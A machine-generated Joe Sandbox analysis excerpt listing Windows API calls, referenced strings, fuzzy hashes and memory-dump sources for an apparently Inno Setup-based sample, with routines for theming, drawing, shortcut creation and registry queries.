                                                                                                      • Snapshot File: hcaresult_2_2_10000000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                                      • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                                      • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2631587981.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2631554206.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2634215060.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_10000000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                                      • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                        • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                                      • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                      • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                      • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                                      • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoadVersion
                                                                                                      • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                      • API String ID: 1968650500-2910565190
                                                                                                      • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                      • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                                      • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                                      • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 0041CA40
                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                                      • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                                      • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                                      • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                                      • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                                      • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                                      • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                                      • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                                      • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                                      • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                                      • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                                      • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                                      • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                                      • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                                      • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                                        • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 269503290-0
                                                                                                      • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                      • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                                      • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                                      • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                                      • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                                      Strings
                                                                                                      • {pf32}\, xrefs: 0045671E
                                                                                                      • IPersistFile::Save, xrefs: 00456962
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                                      • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                                      • CoCreateInstance, xrefs: 004566AF
                                                                                                      • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                                      • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                                      • IPropertyStore::Commit, xrefs: 004568E3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance$FreeString
                                                                                                      • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                                      • API String ID: 308859552-2363233914
                                                                                                      • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                      • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                                      • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                                      • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                                        • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                      • API String ID: 2000705611-3672972446
                                                                                                      • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                      • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                                      • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                                      • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                      • API String ID: 1452528299-3112430753
                                                                                                      • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                      • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                                      • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                                      • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                                        • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                      • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                      • API String ID: 59345061-4263478283
                                                                                                      • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                      • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                                      • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                                      • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                                      APIs
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                                      • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                                      • GetDC.USER32(00000000), ref: 0041B402
                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 644427674-0
                                                                                                      • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                      • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                                      • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                                      • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                      • API String ID: 971782779-3668018701
                                                                                                      • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                      • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                                      • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                                      • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                                        • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                                      • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                                      Strings
                                                                                                      • , xrefs: 004548FE
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                                      • RegOpenKeyEx, xrefs: 00454910
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
